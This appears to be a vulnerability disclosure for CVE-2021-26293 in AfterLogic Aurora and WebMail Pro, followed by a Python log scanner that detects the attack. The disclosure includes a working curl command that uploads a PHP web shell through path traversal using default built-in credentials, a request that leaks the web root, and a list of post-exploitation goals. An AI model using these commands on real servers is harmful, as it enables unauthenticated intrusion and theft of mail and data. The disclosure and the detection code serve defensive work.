CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md

CVE-2021-26293 - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function

Gained Access: Web server user (Apache, Nginx, etc.)

Resources:

Authors:

  • Emre KELEŞ - @emrekeles on Twitter
  • Emircan YILDIZ - @scorpsec on Twitter
  • Halil Emre ÖZEN - @halilemreozen on Twitter

Report Summary:

AfterLogic Aurora and WebMail Pro versions 7.7.9 and lower are affected by this vulnerability. Simply sending an HTTP PUT request to the WebDAV endpoint with the built-in account “caldav_public_user@localhost” and its predefined password “caldav_public_user” allows the attacker to create or overwrite files with malicious content such as web shells, database dumpers, etc.

After uploading a malicious PHP file to the web server, some example actions the attacker can take:

  1. Download / modify the database
    1. Email addresses with easily decodable passwords
    2. CalDAV data (calendars of the users)
    3. CardDAV data (contacts of the users)
  2. Download user-uploaded private WebDAV files.
  3. Intercept, read or modify the emails of webmail users.
    1. A way to read emails, because webmail servers are usually whitelisted on mail servers while normal clients are subject to thresholds
    2. A good way to spread malicious executables/mails to users without struggling with mail gateways/spam blockers.
    3. Acting as the real user and sending vicious emails to important users/companies
    4. Sending bulk emails for spam campaigns.
  4. Attempt privilege escalation to get root/administrator on the server.

Etc...

To Reproduce:

Upload the malicious file with the following curl command:

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

As the AfterLogic WebMail Pro docs mention, “the web root usually looks like /var/www/html”, and the PoC above assumes files are located under Apache’s standard /var/www/html path. It may differ depending on the configuration, but that is not a blocker for the attacker, because we realized that some of the endpoints expose the document root path when an invalid path parameter is requested.

Ways to figure out the document root directory on customized web server configurations:

  1. Using an invalid path to trigger a SabreDAV error, which discloses the full path to the webroot.
    curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
  2. Trying common web server paths
  3. Brute force (append another ../ to the URL until the uploaded malicious file returns HTTP 200.)

Technical Description:

  • dav\server.php (handles the request, creates the \afterlogic\DAV\Server instance)
  • \libraries\Sabre\DAV\server.php -> exec (passes the request method and URI to invokeMethod)
  • \libraries\Sabre\DAV\server.php -> invokeMethod
  • \libraries\Sabre\DAV\server.php -> httpPut
  • \libraries\Sabre\DAV\FS\File.php -> put

The Unrestricted Upload of File with Dangerous Type and Directory Traversal problems start at step 2 / exec: it neither sanitizes the given path parameters nor checks the file extension, which lets the attacker write into parent directories and then execute the malicious file.

Because of the above problem, any user who can log in can upload malicious files; with the caldav_public_user@localhost account, attackers don’t need any user information because it has a predefined password, so the vulnerability becomes publicly accessible.
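The two checks the report says are missing at step 2 (path containment and file-extension filtering) are also exactly what a defender can verify after the fact in web server access logs. The following is an added example, not code from the report or from AfterLogic: it percent-decodes the request path (so %2e%2e and double-encoded %252e%252e both become ".."), walks the segments to decide whether the request escapes the /dav/server.php/files/ tree, flags dangerous extensions on write methods, and flags any write by the built-in caldav_public_user@localhost account. The log lines, the IP addresses, the extension list and the set of "write" WebDAV methods are constructed assumptions for the example; the field order assumes Apache's combined log format, where the third field is the Basic-auth user.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (not from the report).
# The third field is the authenticated user as Apache records it for Basic auth.
SAMPLE_LOG = """\
203.0.113.5 - caldav_public_user@localhost [01/Feb/2021:10:00:01 +0000] "PUT /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e/var/www/html/shell.php HTTP/1.1" 201 0 "-" "curl/7.68.0"
203.0.113.5 - caldav_public_user@localhost [01/Feb/2021:10:00:02 +0000] "DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 500 1204 "-" "curl/7.68.0"
198.51.100.7 - alice@example.tld [01/Feb/2021:10:05:00 +0000] "PUT /dav/server.php/files/personal/report.pdf HTTP/1.1" 201 0 "-" "Mozilla/5.0"
198.51.100.7 - alice@example.tld [01/Feb/2021:10:06:00 +0000] "PROPFIND /dav/server.php/calendars/alice/ HTTP/1.1" 207 3201 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

FILES_PREFIX = "/dav/server.php/files/"        # WebDAV files tree seen in the PoC URL
PUBLIC_USER = "caldav_public_user@localhost"   # built-in account named in the report
# Assumption: WebDAV methods that create, change or remove server-side files.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
# Assumption: extensions a typical PHP-enabled web root would execute.
DANGEROUS_EXT = {".php", ".phtml", ".php5", ".phar"}


def decode_path(raw):
    """Percent-decode until the string stops changing, so %2e%2e and %252e%252e both yield '..'."""
    current = raw
    for _ in range(4):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def resolve_within(rel):
    """Walk path segments the way a filesystem would.

    Returns (escaped, normalized): escaped is True when a '..' pops past the
    root of the tree, i.e. the request resolves outside FILES_PREFIX.
    Empty and '.' segments (from '//' and '/./') are ignored.
    """
    stack = []
    escaped = False
    for seg in rel.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(seg)
    return escaped, "/".join(stack)


def analyze_line(line):
    """Return a list of finding tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    user, method = m.group("user"), m.group("method")
    path = decode_path(m.group("path"))
    if not path.startswith(FILES_PREFIX):
        return []
    findings = []
    escaped, normalized = resolve_within(path[len(FILES_PREFIX):])
    if escaped:
        findings.append("path_traversal")
    if method in WRITE_METHODS and posixpath.splitext(normalized)[1].lower() in DANGEROUS_EXT:
        findings.append("dangerous_upload")
    if method in WRITE_METHODS and user == PUBLIC_USER:
        findings.append("public_account_write")
    return findings


def scan(log_text):
    """Return (ip, method, findings) for every suspicious line in the log text."""
    report = []
    for line in log_text.splitlines():
        findings = analyze_line(line)
        if findings:
            m = LOG_RE.match(line)
            report.append((m.group("ip"), m.group("method"), findings))
    return report


if __name__ == "__main__":
    for ip, method, findings in scan(SAMPLE_LOG):
        print(ip, method, ", ".join(findings))
```

Run against the constructed sample, the PoC-style PUT is reported with all three tags and the error-triggering DELETE with "public_account_write"; the legitimate upload and the PROPFIND produce nothing. The same resolve_within logic is the containment check a server-side handler would apply before touching the filesystem: any request that escapes the base, or that targets an executable extension, is rejected instead of written.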